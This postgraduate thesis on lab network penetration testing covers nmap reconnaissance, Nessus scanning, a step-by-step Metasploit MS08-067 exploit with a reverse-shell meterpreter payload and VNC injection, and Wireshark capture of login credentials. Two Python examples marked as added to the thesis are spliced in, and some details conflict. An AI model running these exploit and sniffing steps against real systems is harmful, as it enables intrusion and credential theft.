CERTIFICATE
Dr. Md Whaiduzzaman
Supervisor
BOARD OF EXAMINERS
DECLARATION
I hereby declare that this project work is based on the results found by
ourselves. Materials of work found by other researchers are mentioned by reference.
This thesis, neither in whole nor in part, has been previously submitted for any
degree.
____________________
Md Yusuf Miah
PMIT: 172139
DEDICATION
This research paper is dedicated to my dear father, who has been my
inspiration for my studies as a whole until today, and my beloved mother who, for
months past, has encouraged me attentively with her fullest and truest attention to
accomplish my work with truthful self-confidence.
LIST OF TABLES AND FIGURES
Fig-1.1: Network Penetration Approach and Methodology
Fig-3.4: Nessus
Fig-4.8: Start Capturing
LIST OF ABBREVIATIONS
ACKNOWLEDGEMENT
In completing this Post Graduate project I have been fortunate to have the support and
encouragement of many people. I would like to acknowledge them for their
co-operation.
I also feel fortunate to be blessed with the guidance and encouragement of my
faculty members. And we remember our friends who helped and supported us a lot.
ABSTRACT
With the emergence of network globalization and the advent of the internet as the major
tool for international exchange of information, security has always been the most
talked-about topic. Although there are many ways to secure systems and
applications, the only way to truly know how to secure the network is to test it using
some testing procedures.
Hacking and penetration testing is a testing procedure that is performed to test the
perimeter of a network for security breaches and vulnerabilities. Penetration testing
is also known as ethical hacking because the test is performed by a team of security
experts who have the organization's permission to hack the network in an attempt to
identify vulnerabilities.
Any security issues that are found will be presented to the system owner, together
with an assessment of their impact, and often with a proposal for mitigation or a
technical solution. Thus all the work is done in a proper manner.
TABLE OF CONTENTS
Certificate
Candidate's Declaration
Dedication
List of Tables and Figures
List of Abbreviations
CHAPTER 1 Introduction ........ 1-8
1.0 Overview ........ 1
1.1 Introduction ........ 2
1.2 Objective of the Study ........ 3
1.3 Research Problem Statement ........ 4
1.4 Limitations and Delimitation of the Study ........ 4
1.5 Internal Penetration Test ........ 5
1.6 External Penetration Test ........ 7
1.7 Approach ........ 8
CHAPTER 2 Information Gathering ........ 9-15
2.1 Introduction ........ 9
2.2 Service and OS Detection ........ 10
2.3 Topology ........ 11
2.4 Whois Information ........ 12
2.5 IP Address ........ 13
2.6 Web Server ........ 14
2.7 Sub Domain ........ 15
CHAPTER 3 Vulnerability Analysis of Network ........ 16-24
3.1 Introduction ........ 16
3.2 Black Box Network Vulnerability Assessment ........ 17
3.3 White Box Network Vulnerability Assessment ........ 18
3.4 Gray Box Network Vulnerability Assessment ........ 19
3.5 Nessus Vulnerability Scanner ........ 20
CHAPTER 4 Exploitation ........ 25-33
4.1 Introduction ........ 25
4.2 Scanning Phase ........ 26
4.3 Packet Sniffers by Wireshark Tool ........ 30
CHAPTER 5 Discussion and Conclusion ........ 33-36
5.1 Analysis and Discussion ........ 33
5.2 Reflection on The Proposal Methodology ........ 34
5.3 Contribution ........ 35
5.4 Future Work ........ 35
5.5 Conclusion ........ 36
References ........ 37
CHAPTER 1
Introduction
1.0. Overview
This type of assessment is an attack simulation carried out by our highly trained
security consultants in an effort to:
As a result of our penetration tests, you’ll be able to view your applications through
the eyes of both a hacker and an experienced developer to discover where you can
improve your security posture. Our consultants produce findings in written reports
and provide your team with the guidance necessary to effectively remediate any
issues we uncover.
1.1 Introduction
About two or three decades ago, people were quite happy to leave their houses and
cars unlocked due to low crime levels. However, times have changed and the
world is fast becoming an insecure place to live, especially for organizations which
deal with an influx of heavy data on a daily basis, since security has always been an
important issue due to network globalization and the internet. Ethical hacking
and penetration techniques are preventive measures which consist of a chain of
legitimate tools that identify and exploit a company's security weaknesses. Ethical
hacking and penetration testing is a platform to find out flaws in network systems.
Vulnerability assessment takes centre stage in finding the weaknesses of networks
and exploiting such vulnerabilities to detect the weakness of the network. Penetration
testing in general involves a lot of techniques such as social engineering and
reconnaissance and, most importantly, methodologies for using the required tools. [1]
Fig-1.1: Network Penetration Approach and Methodology
1.3 Research Problem Statement
Ethical hacking and penetration testing is a process in which vulnerabilities are found in an
information system, and such acts are done in consultation with the owners of the
network. Notwithstanding, social engineering is the art of utilizing human behavior
to breach security without the participant even realizing that they have been
manipulated. Sometimes black hat hackers get their chance when there are genuine
gaps in the security that they can breach.
The problem statements of advanced hacking and penetration techniques are as
follows:
Ninety percent (90%) of social engineering techniques are used for active
and passive reconnaissance against the targeted network.
Weak genuine security implementation gaps in networks.
How to eliminate the two main categories of social engineering techniques:
Technology-based deception
Human-based deception
Tools, such as software and methods, available to restrict black hat hackers
after applying a penetration test.
Software tools used to identify vulnerabilities in information systems and
techniques to prevent such flaws.
available and legitimately accessible to the ethical hacker. This prevents a
penetration test from simulating the malicious hackers' activities as closely,
because they are not constrained by any limitations. Firstly, penetration testing may
be governed by the laws and contractual obligations of the organization's system,
because if the test unintentionally retrieves highly confidential information, this may
result in violating the laws and breaching contractual agreements.
This study is limited to:
Getting the right information will not be possible.
Acquiring the right or required software tools for penetration testing.
Incorrect data will be collected when questionnaires are distributed in the
domains of banks, Internet Service Providers (ISPs) and other data centers.
Evaluating software tools without adequate features.
Port Scanning
Exploit Research
Manual Vulnerability Testing and Verification
Manual Configuration Weakness Testing and Verification
Limited Application Layer Testing
Firewall and ACL Testing
Administrator Privileges Escalation Testing
Password Strength Testing
Network Equipment Security Controls Testing
Database Security Controls Testing
Internal Network Scan for Known Trojans
1.6 External Penetration Test
An External Penetration Test differs from a vulnerability assessment in that it
actually exploits the vulnerabilities to determine what information is actually
exposed to the outside world. An External Penetration Test mimics the actions of an
actual attacker exploiting weaknesses in the network security without the usual
dangers. This test examines external IT systems for any weakness that could be used
by an external attacker to disrupt the confidentiality, availability or integrity of the
network, thereby allowing the organization to address each weakness. [3]
Footprinting
Public Information & Information Leakage
DNS Analysis & DNS Bruteforcing
Port Scanning
System Fingerprinting
Services Probing
Exploit Research
Manual Vulnerability Testing and Verification of Identified Vulnerabilities
Intrusion Detection/Prevention System Testing
Password Service Strength Testing
Remediation Retest (optional)
1.7 Approach
MIT Security’s network penetration testing service utilizes a comprehensive, risk-
based approach to manually identify critical application-centric vulnerabilities that
exist on all in-scope applications.
CHAPTER 2
Information Gathering
2.1 Introduction
In the same manner, network penetration is much like this: when you are going
to hunt a website down, you must know what you are really going to deal with; if
you know the enemy you are going to face, then you can prepare yourself for
that.
So this is why information gathering is the first phase of penetration testing. But
now the question arises: what information are we going to collect, and where are we
going to get that information from? "Where and how".
2.1.1 There are two types of information gathering:
Passive Information Gathering
Active Information Gathering
2.2 Service and OS Detection
Most of you know what an operating system is, but if anyone is still unsure
why we need to know the OS: notice that the output is highlighted; for
example, open and closed ports are displayed in different colors. [4]
Explain (Fig-2.1): We've run an intense scan against a host with the IP address
10.10.110.2. A scan window contains five tabs, each displaying different aspects of
the scan results:
root@kali:~# nmap -T4 -A -v 10.10.110.2
-v = Increase verbosity level; use -vv or more for greater effect
-A = Detect OS and services
2.3 Topology
Each circle on the diagram represents a host found on the network. If a host has less
than three open ports, it will be green; more than three but less than six open ports,
yellow; and more than six open ports, red. Hosts with filtered ports will have a
yellow padlock symbol next to them.
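To make the scan output of 2.2 and the colour rule of 2.3 concrete, here is an added Python example (not code from the thesis) that parses nmap's XML report, produced by adding -oX to the scan command above, and applies the topology colour rule to each host. The sample XML, its addresses, services and OS guesses are constructed; where the text leaves a boundary unspecified (exactly three or six open ports) the code states its assumption.

```python
"""Parse nmap -oX XML (the nmap -T4 -A -v scan above, run again with -oX) and
colour each host by the Topology rule: fewer than three open ports is green,
three to six is yellow, more than six is red, and any filtered port adds a
padlock marker. Added example; the XML below is constructed, not a real scan."""
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX format; hosts, services and OS guesses are assumed.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -v -oX scan.xml 10.10.110.0/29">
  <host><status state="up"/>
    <address addr="10.10.110.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
    <os><osmatch name="Linux 4.X" accuracy="95"/></os>
  </host>
  <host><status state="up"/>
    <address addr="10.10.110.3" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="8080"><state state="filtered"/><service name="http-proxy"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP3" accuracy="90"/></os>
  </host>
  <host><status state="down"/><address addr="10.10.110.4" addrtype="ipv4"/></host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return one record per host that is up: address, OS guess, open ports
    as (port, protocol, service) tuples, and the count of filtered ports."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth classifying
        addr = host.find("address[@addrtype='ipv4']")
        open_ports, filtered = [], 0
        for port in host.findall("./ports/port"):
            state = port.find("state")
            state = state.get("state") if state is not None else "unknown"
            if state == "filtered":
                filtered += 1
            elif state == "open":
                svc = port.find("service")
                name = svc.get("name") if svc is not None else "unknown"
                open_ports.append((int(port.get("portid")), port.get("protocol"), name))
        osmatch = host.find("./os/osmatch")
        hosts.append({
            "addr": addr.get("addr") if addr is not None else "unknown",
            "os": osmatch.get("name") if osmatch is not None else "unknown",
            "open_ports": sorted(open_ports),
            "filtered": filtered,
        })
    return hosts

def topology_colour(open_count):
    """Colour per the rule above. The text leaves exactly 3 and exactly 6
    unspecified; this example counts both as yellow (an assumption)."""
    if open_count < 3:
        return "green"
    if open_count <= 6:
        return "yellow"
    return "red"

def classify_hosts(xml_text):
    """Map each up host's address to its colour, padlock flag, open-port
    count, open service names and OS guess."""
    summary = {}
    for h in parse_nmap_xml(xml_text):
        summary[h["addr"]] = {
            "colour": topology_colour(len(h["open_ports"])),
            "padlock": h["filtered"] > 0,
            "open": len(h["open_ports"]),
            "services": [name for _, _, name in h["open_ports"]],
            "os": h["os"],
        }
    return summary
```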
2.4 Whois Information
This is the most basic information about a domain. It shows the registration details
of the website, in which you can commonly see who registered the domain, on which
date it was registered, when it will expire, etc. This information may sometimes help
in social engineering, such as sending the registrant an email at the registered address, or
using the registrant's address, name or contact number in various social engineering tasks.
Explain (Fig-2.3): Find information on any domain name or IP. A large database of
whois information, DNS, domain names, name servers etc.
2.5 IP Address
This one is for newbies: actually, the IP address is the real address behind any
domain name, and domain names are resolved to it by the nameservers. Every box, or you
could say system, has a unique IP address, for example 162.248.48.130. Computers use it
to communicate with each other. The IP address will help us target the network
as well as find open ports and other exploitable services on the system during the
penetration test.
Explain (Fig-2.4): The nslookup (which stands for name server lookup) command
finds name server information for domains by querying the Domain Name System.
2.6 Web Server
A web server, the one we are dealing with over here, is an application which runs over
an operating system and serves the web requests coming to the system. Apache,
Tomcat, IIS etc. are web servers running on an operating system; when any
web request is sent to a system they handle it and they are responsible for giving out
the response. Many times you can get exploits related to a web server and get a way
into the system using that exploit, and if you know which web server is being used
then it will help you to find out the default directories or known vulnerabilities for
that web server. [6]
Explain (Fig-2.5): Find information on the web server: which server and PHP
version are in use.
2.7 Sub Domain
If you do not know what subdomains are: subdomains are domains maintained
under a domain. For example, google.com is a domain name and mail.google.com is a
subdomain inside it. We need to collect all available subdomains for a website. In
many cases you may find hidden or private domains where something private is being
maintained, and such applications are usually left vulnerable and exposed
because of the assumption that no one can reach them. [7]
Explain (Fig-2.6): A subdomain is a domain that is part of a larger domain; the only
domain that is not also a subdomain is the root domain. Notice that the output was
highlighted; for example, each subdomain is displayed with a different IP.
CHAPTER 3
Vulnerability Analysis of Network
3.1 Introduction
Vulnerability analysis, also known as vulnerability assessment, is a process that
defines, identifies, and classifies the security holes (vulnerabilities) in a computer,
network, or communications infrastructure. In addition, vulnerability analysis can
forecast the effectiveness of proposed countermeasures and evaluate their actual
effectiveness after they are put into use.
The list of vulnerability assessment tools is quite long. Among the most well-known
are OpenVAS, Nessus, Nikto, Wireshark, W3af, BurpSuite, SQLMap, IBM
Application Security on Cloud, etc.
Explain (Fig-3.1): This is an overview of how corporate networks are organized and
how a black box network vulnerability assessment is carried out.
3.3 White Box Network Vulnerability Assessment
If the cybersecurity team is to perform a white box network vulnerability assessment,
they look at the network 'from the inside,' having all the privileges of the network's
authorized users. They can see the entire network with its file servers and databases. The
security engineers have administrator access to all the servers inside the network.
Their aim is not just to scan the network for vulnerabilities, but also to check the
security of the configuration of the machines inside the network.
Explain (Fig-3.2): This is an overview of how corporate networks are organized and
how a white box network vulnerability assessment is carried out.
3.4 Gray Box Network Vulnerability Assessment
The third option is gray box network vulnerability assessment, which encompasses both
approaches but is closer to black box vulnerability assessment. Security engineers
conduct a gray box vulnerability assessment if they get some information on the
organization's network, such as user login details, but they don't get access to the
entire network.
Explain (Fig-3.3): This is an overview of how corporate networks are organized and
how a gray box network vulnerability assessment is carried out.
3.5 Nessus Vulnerability Scanner
Explain (Fig-3.4): This is the admin login page of the Nessus Vulnerability Scanner tool.
Fig-3.4: Nessus
Step 2: New Scan in Nessus
You can start a new scan by clicking on the New Scan button. You can also create
multiple scans depending on your requirements.
Explain (Fig-3.5): This is the starting page for adding a new scan in the Nessus
Vulnerability Scanner tool.
Step 3: Scan Type and Settings.
You may have to enter scan details like the name of the scan, a description of the scan
and even the targets. This includes the IP addresses of the targets.
Explain (Fig-3.6): This is an overview of the target IP and the general settings of the
scanning system.
Step 4: Scan Type
Depending on your package, you can select the type of scan that you are willing to
run. You may have to upgrade the package in order to run some special scans.
Explain (Fig-3.7): This is an overview of the scan types, and which is preferred for the
target.
Explain (Fig-3.8): This is an overview of the scan result. Now we see how many
vulnerabilities there are, critical or low.
Fig-3.8: Scan Result
Step 6: Detailed Report
You can also click on the name of the vulnerability to find a detailed report about the
vulnerability and the available fix.
CHAPTER 4
Exploitation
4.1 Introduction
Exploitation is the high point for every security engineer. It is a great feeling to exploit
a first machine and get full control over that machine. Exploitation is a very difficult
task to accomplish. We need to know much about the target. In this chapter I will
show you advanced techniques to get a shell on the target system, and you will gain full
control over the victim system.
4.2 Scanning Phase
The first thing when you want to hack a server is to get as much information about the
target as you can. So the first thing we must do is scan the server.
Metasploit has "db_nmap", a module that is used to run nmap (the most famous
scanning tool); when it gets the result from nmap, it puts the results into the
database which was created to keep the results. Follow these steps:
Step 3: Search for netapi to use the exploit against the Windows XP machine.
msf5 > search netapi
Step 4: Enter the command:
msf5 > use exploit/windows/smb/ms08_067_netapi
Explain (Fig-4.2): Now we will search for the netapi exploit. We'll be shown a number
of results, among which we'll find the one below; then we check whether it works
against the target or not.
Step 5: Enter the command show options. Now it's time to enter the victim's IP address.
The command for that is:
set RHOST enter_victim_ipaddress
Step 6: Load the payload to compromise the victim machine:
set payload windows/meterpreter/reverse_tcp
Explain (Fig-4.3): The exploit is chosen and we need to set certain parameters for
this exploit.
Fig-4.3: Set Payload
Step 7: Set the attacker's IP address to get a reverse connection from the victim machine:
set LHOST your_ipaddress
Explain (Fig-4.4): Set LPORT and LHOST, which are the port number and IP address of
the local (attacker) machine.
Step 8: For example, run vnc.
We can inject a VNC server remotely using the Metasploit payload for VNC
injection.
Explain (Fig-4.5): Virtual Network Computing (VNC) is a graphical desktop
sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely
control another computer.
Explain (Fig-4.6): This is victim Machine…
4.3 Packet Sniffers by Wireshark Tool
In Wireshark go to Capture > Interface and tick the interface that applies to you. In
my case, I am using a wireless USB card, so I've selected wlan0. [10]
Explain (Fig-4.7): When we launch Wireshark, a welcome screen lists the available
network connections on the current device. Displayed to the right of each is an
EKG-style line graph that represents live traffic on that network.
Fig-4.7: Run Wireshark
Ideally you could just press the Start button here and Wireshark will start capturing
traffic. In case you missed this, you can always capture traffic by going back to
Capture > Interface > Start.
Explain (Fig-4.8): Start Wireshark by clicking on the Wireshark start icon. When
Wireshark starts it launches the following screen and provides the following ways to
capture network traffic.
Fig-4.8: Start Capturing
When we type in the username and password and press the Login button, it generates a
POST request (in short, you're sending data to the remote server).
To filter all traffic and locate POST data, type the following in the filter section:
http.request.method == "POST"
See the screenshot below. It is showing 1 POST event.
Explain (Fig-4.9): The most basic way to apply a filter is by typing it into the filter
box at the top of the window and clicking Apply (or pressing Enter). For example,
type "http" and you'll see only HTTP packets. When we start typing, Wireshark will
help us auto-complete our filter.
Fig-4.9: HTTP Request
Step 3: Analyze POST data for username and password
Now click on the line HTML Form URL Encoded.
Explain (Fig-4.10): The POST data is the result of the user information; the email and
password form the different items.
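As an added example (not code from the thesis), the following Python audit reproduces the POST filter and the form-field analysis above on captured requests, from the defender's side: it flags logins whose credential fields were submitted over plain HTTP and reports only the field names, never the values. The raw requests, the host name and the field names are constructed.

```python
"""Audit captured HTTP requests for form logins sent in the clear, the case the
Wireshark filter http.request.method == "POST" and the HTML Form URL Encoded
view above make visible. Added example; the requests below are constructed."""
from urllib.parse import parse_qs

# Constructed raw requests as they would appear in a capture (assumed host and fields).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1\r\nHost: intranet.example.test\r\n\r\n",
    "POST /login HTTP/1.1\r\nHost: intranet.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 41\r\n\r\n"
    "email=user%40example.test&password=s3cret",
    "POST /api/search HTTP/1.1\r\nHost: intranet.example.test\r\n"
    "Content-Type: application/json\r\nContent-Length: 15\r\n\r\n"
    '{"q": "report"}',
]

# Field names treated as credentials (assumed list; extend for local form naming).
CREDENTIAL_FIELDS = ("password", "passwd", "pwd", "pass")


def parse_http_request(raw):
    """Split a raw request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def is_post(req):
    """Equivalent of the display filter http.request.method == "POST"."""
    return req["method"] == "POST"


def form_fields(req):
    """Decode an application/x-www-form-urlencoded body (what Wireshark shows
    as HTML Form URL Encoded) into {field: value}; {} for other content types."""
    ctype = req["headers"].get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return {}
    return {k: v[0] for k, v in parse_qs(req["body"], keep_blank_values=True).items()}


def audit_cleartext_logins(raw_requests):
    """Return one finding per POST whose form carries a credential-looking field.
    Only field names are reported, so the finding can be shared without leaking
    the very secret the audit is about."""
    findings = []
    for raw in raw_requests:
        req = parse_http_request(raw)
        if not is_post(req):
            continue
        fields = form_fields(req)
        secret = [f for f in fields if f.lower() in CREDENTIAL_FIELDS]
        if secret:
            findings.append({
                "host": req["headers"].get("host", "?"),
                "path": req["path"],
                "fields": sorted(fields),
                "credential_fields": secret,
            })
    return findings
```

A finding here means the login form should be served and submitted over HTTPS only, since anyone positioned as in Fig-4.9 can read the same bytes.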
CHAPTER 5
Discussion and Conclusion
5.1 Analysis and Discussion
The intelligence gathering phase identified the machines that were reachable and the
ports open on them, and guessed the OS and services on those reachable machines. Nmap
was the primary tool selected for the intelligence gathering phase. Nmap proved to be a
versatile tool which can perform different scans, ranging from ping scan to port scan
to OS and service fingerprinting. Initially Nmap was used to scan the entire
172.29.81.0/20 network range. This scan successfully identified many machines, but only
four targeted machines, whose IP addresses were 172.29.81.2/20, 172.29.81.90/20 and
172.29.81.93/20, were identified as targets. This result showed that ICMP
packets within the network were not blocked, and the scan result showed all 1000 ports
on the identified machines were unfiltered, which meant no firewalls or perimeter
devices were used to filter the data on the target machines.
The detailed Nmap scan showing open ports, closed ports and the number of services
running on the machines was fully captured in Tables 4.17 and 4.18 respectively.
The fascinating result was obtained from the main target machine when the Armitage
tool was used: the vulnerable service used to compromise the machine was found when
Metasploit was applied, which revealed, via msf > use exploit/windows/smb/ms08_067_netapi,
that 172.29.81.2 port 445 was vulnerable, and therefore the target was vulnerable. Both
Windows XP and Windows 8 were running the default installation with no additional
software installed on the machines. In the laboratory network, both of these vulnerabilities
were successfully exploited using the Metasploit Framework through Armitage, which is the
Metasploit Framework graphical interface, as shown in Figure 4.19.
5.2 Reflection on The Proposal Methodology
One of the goals set in this thesis was to identify how penetration testing is lawfully
conducted, in order to understand and analyze security issues pertaining to network systems
as a whole. In order to achieve this goal, a penetration testing methodology was proposed in
section 4.1. Following this methodology, penetration tests were conducted against
the laboratory network. The laboratory network represented an internal network with a
few client and server machines. For network and system administrators, securing
the network and systems is an important task to protect the network or system from
outside as well as inside attacks. Security measures like firewalls and Intrusion
Detection Systems (IDS) help to protect, but such measures are not always sufficient
in today's complex environment. A methodological penetration test complements
such security measures by testing whether the security measures in place are good enough
or have some flaws or misconfiguration.
The proposed methodology not only presented how network and system
administrators can utilize a penetration test, but also helped them understand the flow of
the test along with each phase. It also showed how free or open source software can
effectively test networks or systems. These were discussed in the literature and
methodology chapters, which demonstrated how such tools complement an
administrator's efficiency at assessing the overall system security. The tools selected in
each phase of the proposed methodology were easy to install and configure, the
learning curve to use such tools was minimal, and they did not require high-end
hardware to set up the penetration test.
Scanners enhance the scanning and assessment and discover extra information
which might have been missed during the reconnaissance gathering phase. The results or
report analysis from the reconnaissance phase can provide a deeper insight into the
network or system.
Moreover, such analysis helped further to find out what the real flaws were, whether
a faulty configuration or unpatched systems. The penetration testing
methodology was successful at achieving the objective set in the scanning and vulnerability
assessment phase. From the pen-tester's perspective, one can argue: should the tester
spend additional time performing such penetration testing? Results drawn from this
thesis showed that penetration testing had value when performed in a systematic and
methodological manner. Penetration testing is something that network and system
administrators have often had to do without, because of all the other activities they
perform to harden the system.
5.3 Contribution
Network administrators should be skillful enough to perform penetration testing to know
what flaws their network systems have. Not all network/system administrators can afford
to purchase the commercial tools to perform penetration tests. Especially for an
administrator who works in a medium or small organization, there will not always be a
separate budget allocation to purchase tools or hire a third-party professional to perform
penetration tests. In such a situation this thesis work can provide baseline
information with all the tools and methodology. Any administrator can easily replicate
the same or similar penetration testing environment, and depending upon the requirements
the scope can be broadened.
At present, most network/system administrators defend their networks or systems
using firewalls to block unidentified or malicious traffic, Intrusion Detection Systems
(IDS) to detect and respond to attacks, and anti-virus and anti-malware programs to alert
users about malicious software; in every case the goal is to defend the system or network
from malicious users and intrusion attempts. All those measures are protective and
preventive in nature, and can either succeed or fail depending on the time they are
released and current evolutions in technology. However, security should not only include
prevention and protection but also prediction and response.
This thesis also presented a prediction and response model where phases like
intelligence gathering, scanning and vulnerability assessment can be used to
predict threats to the network or system, while phases like exploitation and reporting
are required for the response to counter the threats and loopholes. After a certain time, a
certain vulnerability or attack becomes obsolete, but the knowledge of how the software
responded to an attack of that extent can help in identifying similar behaviors in the
future.
5.5 Conclusion
After going through a deep study of the penetration testing framework and analyzing the
various tools used, we have reached the following conclusions:
This thesis explored and investigated the various network penetration testing tools
and methodologies. The main results are as follows:
Designed and developed an enhanced framework for network penetration testing
over a personally built laboratory. This framework tries to find out the
loopholes and vulnerabilities in the network and exploit them before
attackers do, and hence provides an assurance of a secure network.
Demonstrated the use of penetration testing over a campus network while
avoiding the unnecessary expenditure on professional testers, as they also follow the
same tools and techniques, and their unreliable nature.
The success of any penetration test depends on the underlying methodology. In order
to perform a successful penetration test, the underlying methodology should also make
use of different security tools. One of the goals set in this thesis was to examine
different security tools and techniques. Different tools like Nmap, Nessus, Armitage
and the Metasploit Framework were introduced first and examined. The selection of the
tools was based on their versatility, usability and effectiveness. With all the tools in
hand, each phase of the methodology was carried out in a systematic and methodological
manner. The selected tools were divided into three categories.
The reconnaissance or intelligence gathering phase covered the tools which assisted
in network profiling, network scanning, and operating system and service fingerprinting.
Nmap was identified as one of the best tools during this phase. The scanning and
vulnerability assessment phase covered the tools which allowed the exploration of
network and system vulnerabilities. The Metasploit Framework, or Armitage, was more
than a tool; it was a complete penetration testing framework, but it can also be used
as a tool during the exploitation and post-exploitation phases due to its abundance of
exploits, usability and effectiveness.
References